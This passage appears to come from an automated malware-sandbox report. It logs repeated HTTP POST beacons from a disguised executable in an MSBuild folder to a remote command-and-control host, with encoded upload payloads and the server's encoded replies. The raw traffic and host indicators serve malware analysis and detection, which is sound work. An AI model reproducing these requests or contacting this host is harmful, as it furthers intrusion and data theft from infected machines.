                                                                                      Data Raw: 35 35 38 0d 0a 56 4a 7e 07 7a 7d 67 02 78 04 74 00 7f 61 7c 5a 7c 77 7c 55 68 4e 71 08 7a 70 6f 58 7e 62 60 46 63 63 5b 0b 7a 72 6a 59 76 48 78 4b 7d 5b 78 01 55 4b 72 53 74 72 70 59 7f 4c 7a 59 7d 77 5f 54 78 5f 6b 52 7d 73 56 58 61 61 71 04 63 5f 53 03 7c 62 75 59 7e 6c 7f 55 7d 59 63 07 75 5c 7b 06 7c 5c 6a 5b 7d 60 71 4b 6c 64 6c 4e 79 74 68 00 79 6d 7f 46 6d 5c 5d 59 78 5a 79 5f 7d 63 6b 5a 78 67 7f 5f 7c 72 5d 06 76 07 7c 47 7a 51 41 5b 68 77 56 0b 7f 61 5f 43 75 52 6b 5e 78 42 7f 5a 77 60 7e 0c 7a 5f 7d 03 7e 52 5f 5a 6f 61 5f 58 62 73 67 49 61 62 60 04 60 61 76 50 7e 5d 79 5f 60 5c 6e 5f 61 66 6f 50 68 6c 65 01 60 6f 74 04 7f 73 6c 06 78 6c 64 5a 6c 4e 65 5b 7c 6d 63 51 74 77 6c 05 7e 62 54 09 6a 6d 7f 0a 7b 6d 66 4f 69 5c 6a 5e 7b 5d 46 51 6b 52 6b 52 6a 5e 68 09 6a 49 61 59 6c 43 74 5a 7b 72 52 48 7c 5f 5a 5a 69 74 7b 42 7c 06 75 4f 6e 5a 7f 5d 7e 61 78 49 63 63 53 51 7b 5c 79 03 76 66 70 02 7e 48 68 07 7d 58 5b 40 76 72 73 49 7c 72 75 01 7c 77 7a 41 7b 58 68 0c 7d 73 67 4a 76 72 61 05 74 61 5b 00 7c 4f 58 00 7e 52 5e 0c 7e 59 67 44 76 71 7f 04 7b 62 6d 04 7c 70 75 44 78 59 60 4d 7b 77 78 07 79 7d 51 05 79 72 64 02 78 5d 72 4f 7c 60 52 4b 79 67 7c 07 7c 62 5d 4f 76 4f 6c 4a 7d 7c 7f 03 7c 59 52 0d 7f 4f 5f 0c 75 42 5a 06 78 7c 52 05 76 70 76 0c 79 5f 7d 49 7c 7c 7e 06 7b 4f 66 04 76 63 77 4b 77 61 64 07 74 4f 7a 0d 7c 60 72 04 77 5c 6d 06 77 75 60 0b 7c 7c 75 4c 77 52 5e 07 7e 63 52 49 79 6c 6f 48 7b 5e 54 4b 7f 53 74 4e 74 59 6c 07 7e 72 72 0d 7d 53 63 42 7b 53 7e 02 7d 62 53 05 7c 60 68 41 7d 6c 74 0a 7e 4e 78 40 7c 77 76 43 7b 43 67 03 78 5c 60 02 7c 71 7f 00 7e 67 5d 4f 7c 70 5b 0d 79 4d 5a 4f 7f 62 64 04 76 73 71 40 79 71 71 4b 75 66 56 07 7e 66 74 05 7e 76 7d 42 77 4c 55 44 7c 72 75 05 7c 49 6a 4e 7b 66 60 4f 7d 4d 7b 03 76 72 75 03 77 4f 5b 01 7c 4f 7a 00 7d 52 78 40 7e 77 67 03 76 5f 73 01 7a 72 75 04 7d 60 79 49 78 67 5e 4c 7b 59 5e 4d 7b 7d 59 03 7a 5c 60 05 78 5d 7e 4e 7b 5d 4e 5a 78 01 70 44 7e 72 67 02 77 71 74 49 7e 0a 63 45 7f 67 55 55 7c 61 79 43 76 7c 5d 5b 7b 52 6b 5a 63 5e 7e 4e 6d 07 66 58 7e 42 66 5f 7a 5c 79 05 5c 07 0f 7d 62 60 67 7b 5a 4c 7e 4a 78 5e 50 04 76 72 53 4d 62 66 73 51 7f 42 75 4c 63 7c 6c 4c 7e 70 7c 44 79 6f 60 58 7a 70 62 44 68 7d 5e 08 74 77 52 4c 7d 5b 7a 0a 7a 53 59 51 63 7e 0e 45 52 05 54 79 56 63 49 08 53 6e 6f 4c 51 6c 6b 54 50 5d 79 5c 57 7a 7b 40 7f 5c 6b 5c 7f 72 77 02 7c 67 7b 08 7c 60 66 52 6d 5a 74 42 7f 72 5d 59 76 70 62 51 6d 07 7e 5f 75 00 7f 5e 7e 5f 64 40 7d 75 7d 0c 70 5c 42 04 7b 5b 54 59 50 00 71 4a 52 65 5d 48 51 5b 0b 49 62 6e 7e 07 63 6d 76 00 78 5f 5c 58 7d 6c 60 09 7c 59 77 01 74 5f 77 47 7b 65 0c 4a 7c 77 71 40 7f 5e 5d 58 54 00 7b 46 52 6e 56 41 55 5a 0c 5b 54 6f 65 03 7b 5e 56 5a 62 74 73 49 7a 70 6c 5b 62 07 73 4a 7a 51 41 5b 68 01 67 4e 51 72 4c 08 62 0a 55 43 6d 0b 7b 5d 63 06 5b 4f 56 5c 7d 06 7a 53 06 5a 51 58 75 5a 61 64 7f 40 71 58 51 5a 5b 06 75 4a 55 63 57 47 5b 5a 01 4c 62 66 5d 48 53 0a 05 71 5b 0a 6b 59 78 5d 56 5a 62 54 6f 5b 79 77 79 5d 68 6e 00 4e 5b 7b 6f 58 51 61 02 5e 50 54 60 56 54 6e 0e 43 64
                                                                                      Data Ascii: 558VJ~z}gxta|Z|w|UhNqzpoX~b`Fcc[zrjYvHxK}[xUKrStrpYLzY}w_Tx_kR}sVXaaqc_S|buY~lU}Ycu\{|\j[}`qKldlNythymFm\]YxZy_}ckZxg_|r]v|GzQA[hwVa_CuRk^xBZw`~z_}~R_Zoa_XbsgIab``avP~]y_`\n_afoPhle`otslxldZlNe[|mcQtwl~bTjm{mfOi\j^{]FQkRkRj^hjIaYlCtZ{rRH|_ZZit{B|uOnZ]~axIccSQ{\yvfp~Hh}X[@vrsI|ru|wzA{Xh}sgJvrata[|OX~R^~YgDvq{bm|puDxY`M{wxy}Qyrdx]rO|`RKyg||b]OvOlJ}||YRO_uBZx|Rvpvy_}I||~{OfvcwKwadtOz|`rw\mwu`||uLwR^~cRIyloH{^TKStNtYl~rr}ScB{S~}bS|`hA}lt~Nx@|wvC{Cgx\`|q~g]O|p[yMZObdvsq@yqqKufV~ft~v}BwLUD|ru|IjN{f`O}M{vruwO[|Oz}Rx@~wgv_szru}`yIxg^L{Y^M{}Yz\`x]~N{]NZxpD~rgwqtI~cEgUU|ayCv|][{RkZc^~NmfX~Bf_z\y\}b`g{ZL~Jx^PvrSMbfsQBuLc|lL~p|Dyo`XzpbDh}^twRL}[zzSYQc~ERTyVcISnoLQlkTP]y\Wz{@\k\rw|g{|`fRmZtBr]YvpbQm~_u^~_d@}u}p\B{[TYPqJRe]HQ[Ibn~cmvx_\X}l`|Ywt_wG{eJ|wq@^]XT{FRnVAUZ[Toe{^VZbtsIzpl[bsJzQA[hgNQrLbUCm{]c[OV\}zSZQXuZad@qXQZ[uJUcWG[ZLbf]HSq[kYx]VZbTo[ywy]hnN[{oXQa^PT`VTnCd
                                                                                      Mar 6, 2024 09:52:32.812118053 CET361INData Raw: 5b 76 43 68 67 78 0e 7b 53 0c 55 54 59 77 53 6a 60 7e 47 7c 54 56 5f 54 05 73 42 55 62 56 43 51 5f 0f 52 53 07 66 4d 50 7f 73 00 61 04 0c 5a 63 64 79 0e 7d 59 66 67 71 5b 46 5b 69 00 67 41 53 75 40 09 63 04 5e 46 6a 04 7e 43 56 64 06 09 55 5c 55
                                                                                      Data Ascii: [vChgx{SUTYwSj`~G|TV_TsBUbVCQ_RSfMPsaZcdy}Yfgq[F[igASu@c^Fj~CVdU\Uwj`\q\W_ob@UreZy~{ik`_[L{C|[\\Qz@Rd]DT__TVa]WYerPk_YZZg]s^tv^ioEP{gVSb_aCQ]Dcc`XrDikz|^G[Yd\qpsBcm}Ihv^uur[bfOSpf[XoSSpW`dosfZ}PpCwZN
                                                                                      Mar 6, 2024 09:52:32.812155008 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0
                                                                                      Mar 6, 2024 09:52:32.864692926 CET323OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 384
                                                                                      Expect: 100-continue
                                                                                      Mar 6, 2024 09:52:33.215250969 CET384OUTData Raw: 54 50 54 5d 5b 57 50 53 5e 57 5a 51 57 5f 50 59 54 51 54 53 56 58 57 58 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: TPT][WPS^WZQW_PYTQTSVXWXQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X:;26T$*3:83?[%35'"Z3\3$ 2>-9%Z"!Q*1
                                                                                      Mar 6, 2024 09:52:33.231373072 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:52:33.584662914 CET435INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:52:33 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 39 38 0d 0a 02 11 2e 5b 31 3b 24 08 34 0d 33 0b 3d 3d 36 58 3d 31 03 03 28 16 2e 05 28 3c 2a 15 38 07 01 08 3f 3b 37 41 23 11 20 56 35 57 3c 1d 32 03 20 5c 05 11 27 59 24 54 2d 12 27 39 35 1e 30 0f 08 00 26 3c 33 41 2a 3b 26 11 27 07 3c 00 20 33 2b 0b 27 39 33 12 27 01 07 17 3a 07 23 11 25 3d 2d 54 02 17 22 1e 24 2e 27 02 3f 56 38 00 25 54 21 14 28 2d 2c 1e 23 29 06 54 35 0d 0b 1f 26 28 0c 15 35 32 3f 5b 2b 01 3b 5d 24 2c 0d 09 25 04 23 55 22 00 2c 52 0e 3f 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 98.[1;$43==6X=1(.(<*8?;7A# V5W<2 \'Y$T-'950&<3A*;&'< 3+'93':#%=-T"$.'?V8%T!(-,#)T5&(52?[+;]$,%#U",R?\W0
                                                                                      Mar 6, 2024 09:52:33.617494106 CET324OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 1868
                                                                                      Expect: 100-continue
                                                                                      Mar 6, 2024 09:52:33.964373112 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:52:33.964787006 CET1868OUTData Raw: 51 5b 54 59 5b 5f 50 51 5e 57 5a 51 57 5d 50 5a 54 5d 54 5d 56 5b 57 5e 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: Q[TY[_PQ^WZQW]PZT]T]V[W^QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X:8:R0 *&6.\/?$8+X2*'!,,Q!#\'B;_&/>,%Z"!Q*9
                                                                                      Mar 6, 2024 09:52:34.335834980 CET435INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:52:34 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 39 38 0d 0a 02 11 2e 1f 27 3b 3f 1f 37 0d 20 53 2a 2d 04 12 3e 32 32 58 3c 38 32 04 3d 3c 2a 15 2f 2a 3b 09 2b 3b 20 1a 20 3f 02 53 21 22 3c 53 25 29 20 5c 05 11 24 06 26 32 31 59 33 3a 36 02 30 1f 3e 07 26 06 33 06 28 3b 3e 5b 26 39 3c 03 23 0d 3c 11 26 29 2c 06 33 01 2d 5d 39 3d 3f 5b 27 3d 2d 54 02 17 22 1c 24 2d 12 59 2b 33 27 12 26 0b 3e 05 2a 03 27 0f 36 00 2b 0f 35 1d 29 12 26 28 35 05 22 1c 3c 01 2b 06 09 5b 27 05 28 53 31 3e 23 55 22 00 2c 52 0e 3f 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 98.';?7 S*->22X<82=<*/*;+; ?S!"<S%) \$&21Y3:60>&3(;>[&9<#<&),3-]9=?['=-T"$-Y+3'&>*'6+5)&(5"<+['(S1>#U",R?\W0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.44973691.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:52:33.318561077 CET324OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Mar 6, 2024 09:52:33.661731005 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:52:33.662405968 CET2548OUTData Raw: 54 5e 54 5a 5b 5b 55 53 5e 57 5a 51 57 5b 50 5d 54 53 54 5b 56 58 57 5c 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: T^TZ[[US^WZQW[P]TST[VXW\QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X:/:R0#^366\8)&+<%<V6<+6,40$&.X,)%Z"!Q*!
                                                                                      Mar 6, 2024 09:52:34.034509897 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:52:33 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      2192.168.2.44973991.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:52:34.573467016 CET324OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Mar 6, 2024 09:52:34.914844990 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:52:34.915594101 CET2548OUTData Raw: 54 5d 54 50 5e 5d 55 50 5e 57 5a 51 57 5e 50 59 54 51 54 5a 56 5b 57 58 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: T]TP^]UP^WZQW^PYTQTZV[WXQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9D/2.309\$),"Y3801#,<P6,,0B<2Z,%Z"!Q*
                                                                                      Mar 6, 2024 09:52:35.285372972 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:52:35 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      3192.168.2.44974091.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:52:35.762254953 CET324OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Mar 6, 2024 09:52:36.107430935 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:52:36.107726097 CET2548OUTData Raw: 54 5c 54 51 5b 56 55 56 5e 57 5a 51 57 5b 50 52 54 57 54 59 56 5b 57 55 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: T\TQ[VUV^WZQW[PRTWTYV[WUQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9D;1$#!&5%,/1&($&?!<V5']0%,\;%Z"!Q*!
                                                                                      Mar 6, 2024 09:52:36.479062080 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:52:36 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      4192.168.2.44974291.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:52:36.987514019 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:52:37.333208084 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:52:37.333544016 CET2548OUTData Raw: 51 5e 54 5a 5b 56 55 5c 5e 57 5a 51 57 51 50 5c 54 53 54 59 56 5f 57 5a 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: Q^TZ[VU\^WZQWQP\TSTYV_WZQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X:,1' &39/Y>$0'9V5+5$$(%2\8)%Z"!Q*
                                                                                      Mar 6, 2024 09:52:37.707859993 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:52:37 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      5192.168.2.44974391.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:52:38.187553883 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:52:38.532499075 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:52:38.532763958 CET2548OUTData Raw: 54 51 51 5d 5b 56 55 54 5e 57 5a 51 57 5d 50 5b 54 51 54 59 56 5f 57 5c 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: TQQ][VUT^WZQW]P[TQTYV_W\QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9/1%'&%5/Y2'8(%_0"?(5<$$+%Z2Z;%Z"!Q*9
                                                                                      Mar 6, 2024 09:52:38.906996012 CET286INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:52:38 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      6192.168.2.44974591.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:52:39.398377895 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:52:39.741556883 CET25INHTTP/1.1 100 Continue


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      7192.168.2.44974691.227.16.11804520C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Mar 6, 2024 09:52:39.685349941 CET348OUTPOST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 1868
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:52:40.028506994 CET25INHTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:52:40.087990999 CET1868OUTData Raw: 54 5e 51 5e 5e 5b 55 56 5e 57 5a 51 57 5d 50 5c 54 53 54 5b 56 54 57 5b 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: T^Q^^[UV^WZQW]P\TST[VTW[QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X:,6W$1\'&%-/$+32"P5< '4%>\/9%Z"!Q*9
                                                                                      Mar 6, 2024 09:52:40.459626913 CET435INHTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:52:40 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
